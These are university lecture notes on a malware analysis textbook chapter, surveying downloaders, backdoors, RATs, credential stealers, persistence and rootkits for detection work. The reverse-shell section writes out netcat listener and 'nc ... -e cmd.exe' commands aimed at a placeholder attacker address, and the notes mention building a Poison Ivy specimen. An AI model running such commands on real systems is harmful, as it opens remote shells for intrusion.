Chapter 12 Notes
to accompany Sikorski and Honig, Practical Malware Analysis, no starch press.
In the printed book this is Chapter 11.
Malware Behavior
A whirlwind tour of malware functionality
Downloaders and Launchers
- Downloaders get a file from the Internet, presumably malware, and run it.
- Use API call URLDownloadtoFileA, followed by a call to WinExec
- A "launcher" (or "loader") installs malware, for immediate or future execution.
- The launcher may have the malcode encoded inside it
- The launcher may be a script, not an executable binary in its own right
Backdoors
- Provides an attacker with remote access
- Common, and lots of variety
- many take advantage of holes in the Remote Desktop Protocol (RDP)
- A backdoor will often use HTTP to communicate with its masters
- Functionality may include registry manipulation, creating windows, file system operations, etc.
Reverse Shells
- A form of backdoor, which gives attacker a shell
- Using netcat: attacker will run nc -l -p 80 to listen for incoming connections
- Victim will be made to run nc atta.cker.ip.addr 80 -e cmd.exe, causing a shell to run on the victim machine with I/O over the socket.
- Windows Reverse Shells can be basic, or multi-threaded.
- Basic: call CreateProcess with certain STARTUPINFO as input argument, window suppressed
- Multi-threaded: two pipes and two threads, allowing information sent over STDIN or STDOUT to be encoded
- So CreateThread and CreatePipe are indicators.
- Might be easier (or harder?) to notice the traffic using Wireshark
- did we demonstrate Wireshark?
RATs
- RAT = Remote Administration Tool
- not malicious per se, since sysadmins need such a utility to, for example, apply patches to a lab full of PCs
- Servers are installed on compromised victim machines.
- They make contact with the RAT client, which then tells them what to do
- "Poison Ivy is a freely available and popular RAT..."
- doesn't seem to be available at the old web site, but I found a copy here
- and was able to install it, generate a malware specimen, and VirusTotal went nuts!
- demonstrate use of Poison Ivy to build and run malware
- the OVA file for my Windows XP machine. (UMBC only) About 2.4 GB in size.
Botnets
- Botnets employ sets of compromised hosts (zombies)
- RATs work on a more individual level than Botnets
- Botnets usually tell all the zombies to do the same thing, e.g.
mass vs. targeted attacks
- There's a literature on Botnets,
Credential Stealers
- Graphical Identification and Authentication (GINA) allows the use of RFID and smart cards for
logon security, which is good, except when malware authors get involved
- The registry has a key that tells where customized GINA DLLs can be found
- So winlogon.exe will load those DLLs, and then load the default msgina.dll
- So a DLL with many functions of the form Wlx is suspicious
- Pass the Hash!
- Windows hashes are a good source of system credentials, and utilities such as PWdump and Pass-the-Hash are available.
- Hash dumping tools often use the Local Security Authority Subsystem Service, lsass.exe, for their activities
- Keystroke logging!
- kernel-based keyloggers can act as keyboard drivers, bypassing normal protections.
- user-space keyloggers can use hooking or polling
- "Hooking uses the Windows API to notify the malware each time a key is pressed, typically with the SetWindowsHookEx function. Polling uses the Windows API to constantly poll the state of the keys, typically using the GetAsyncKeyState and GetForegroundWindow functions."
- strings such as [Num Lock] in strings listings are suspicious
Persistence Mechanisms
- We've talked about this a lot!
- Malware can hide in the Registry, e.g. HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run
- The Autoruns tool helps find such items
- ProcMon tells us of changes to the Registry
- "AppInit_DLLs are loaded into every process that loads User32. dll, and a simple insertion into the registry will make AppInit_DLLs persistent."
- WinLogon notify and svchost are other popular places to hide
- Trojanizing system binaries: malware modifies system software, such a popular DLLs, to do its dirty work.
- Checking MD5 hashes will help discover such trojanized binaries, and IDA can be used to see what's going on
- DLL-load order hijacking: place malicious files in directories, according to loader's search path, so that malware is loaded instead of legitmate code (this trick is as old as the hills)
Privilege Escalation
- Metasploit "Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments."
- Windows API calls exist to adjust a process's privileges, so code that uses these calls is suspect
- "It’s typically not necessary to analyze the intricate details of the escalation method that malware uses." Maybe so, but new ways of doing this are precioussssss
User-mode Rootkits
- Rootkits are supposed to hide malicious activity
- Books are devoted to this topic
- IAT Hooking modifies the Import Address Table or the Export Address Table, so that malware is
executed instead of legitimate system code
- Easy to detect, for example, by setting breakpoints on the IAT and EAT (?)
- Inline Hooking overwrites legit DLL code